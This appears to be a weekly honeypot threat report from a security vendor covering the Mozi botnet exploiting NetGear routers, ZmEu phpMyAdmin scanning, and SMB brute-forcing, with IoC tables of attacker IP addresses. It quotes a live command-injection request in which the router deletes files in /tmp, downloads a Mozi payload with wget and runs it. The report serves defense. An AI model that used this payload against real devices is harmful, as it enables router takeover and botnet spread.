This week, TEHTRIS is referring to 3 malicious activities observed on its international honeypot network.
IP addresses unknown from public blacklists hosted in China targeting NetGear routers
The default gateway IP for your router is 192.168.1[.]1.
This week, 22 unique IP addresses performed the following URL request on more than half of our European honeypots :
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192.168.1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1The goal of the cybercriminal is to get files from the by default IP address of the NetGear router: 192.168.1[.]1.
In this request, we find also the ‘Mozi.m’ that corresponds to Mozi botnet. In 2019, researchers at Netlab found out that this botnet was spreading through vulnerabilities, especially on IoT. In general, Mozi is used to perform DDoS attacks, to execute the payload from the specified URL or to execute system or custom commands
Attempts to exploit NetGear routers have been observed since 2018 on DGN1000 versions, for which the vulnerability that allows remote code execution has been discovered in 2017. These attack attempts have never stopped evolving since.
IoCs :
| IP | AS | Country |
| 112.94.97[.]143 120.85.112[.]76 120.85.114[.]114 120.85.114[.]125 120.85.117[.]63 120.85.183[.]140 120.85.186[.]39 120.85.91[.]174 220.198.204[.]108 220.198.205[.]193 27.47.3[.]48 | AS 17622 China Unicom Guangzhou network | CN |
| 120.86.237[.]42 120.86.238[.]9 120.86.239[.]161 120.86.255[.]200 27.43.180[.]192 27.43.205[.]168 | AS 17816 China Unicom IP network China169 Guangdong province | CN |
| 121.206.154[.]170 175.4.219[.]195 49.119.92[.]28 223.149.242[.]216 | AS 4134 Chinanet | CN |
| 178.72.70[.]56 | AS 44257 MTS PJSC | RU |
Out of these 22 unique IP addresses, 12 (in bold in the chart above) – which means more than half – are unknown from public databases of malicious IP. The others remain little known. Moreover, 21 are hosted by AS localized in China.
TEHTRIS recommends patching router and always update versions as soon as it is available.
ZmEu: a crawler bot looking for vulnerabilities in phpMyAdmin
This week, in the top 10 of monitored user agents, ZmEu performed a special entrance with nearly 500 hits. ZmEu is a crawler bot is a computer vulnerability scanner which searches for web servers that are open to attack through the phpMyAdmin program (vulnerable versions of the mySQL administration software). It also attempts to guess SSH passwords through brute-force methods and leaves a persistent backdoor. This crawler bot would have been developed in Romania and has been rampant since 2012.
URL requests monitored on our honeypots :
/w00tw00t.at.blackhats.romanian.anti-sec:)
/pma/scripts/setup.php
/phpmyadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/myadmin/scripts/setup.php
/MyAdmin/scripts/setup.phpThe ZmEu tool performs automatic scans by searching for classic paths to site configurations.
These URL requests were performed by 6 unique IP addresses, all identified as malicious IP in public blacklists, on all our European honeypots.
IoCs :
| IP | AS | Country |
| 165.232.160[.]6 | AS 14061 DIGITALOCEAN-ASN | SG |
| 188.166.5[.]240 | AS 14061 DIGITALOCEAN-ASN | NL |
| 167.71.60[.]238 | AS 14061 DIGITALOCEAN-ASN | DE |
| 157.230.110[.]53 | AS 14061 DIGITALOCEAN-ASN | DE |
| 165.22.24[.]138 | AS 14061 DIGITALOCEAN-ASN | DE |
| 95.179.164[.]71 | AS 20473 AS-CHOOPA | DE |
To secure Web servers against this threat, TEHTRIS recommends using and updating to the latest version of PhPMyAdmin.
Persistence of bruteforce attacks on the SMB protocol by unknown IP addresses from public blacklists of malicious IP
This week, 8 IP addresses (in bold in the chart below) out of the top 10 of IP addresses performing bruteforce attempts on protocol SMB on our honeypots, are unknown from malicious blacklists databases of IP carrying out malicious activities. 4 of them are hosted in South America, as observed in week 48.
IoCs :
| IP | AS | Country |
| 88.204.241[.]10 | AS 9198 JSC Kazakhtelecom | KZ |
| 114.32.253[.]93 | AS 3462 Data Communication Business Group | TW |
| 189.203.208[.]115 | AS 22884 TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX |
| 200.119.215[.]68 | AS 25620 COTAS LTDA. | BO |
| 152.231.117[.]93 | AS 27651 ENTEL CHILE S.A. | CL |
| 186.96.10[.]37 | AS 22884 TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX |
| 119.161.98[.]151 | AS 139195 Seans Media Pvt Ltd | IN |
| 142.190.96[.]94 | AS 13760 UNITI-FIBER | US |
| 119.93.147[.]253 | AS 9299 Philippine Long Distance Telephone Company | PH |
| 45.225.194[.]141 | AS 266948 IBIUNET MULTIPLAY | BR |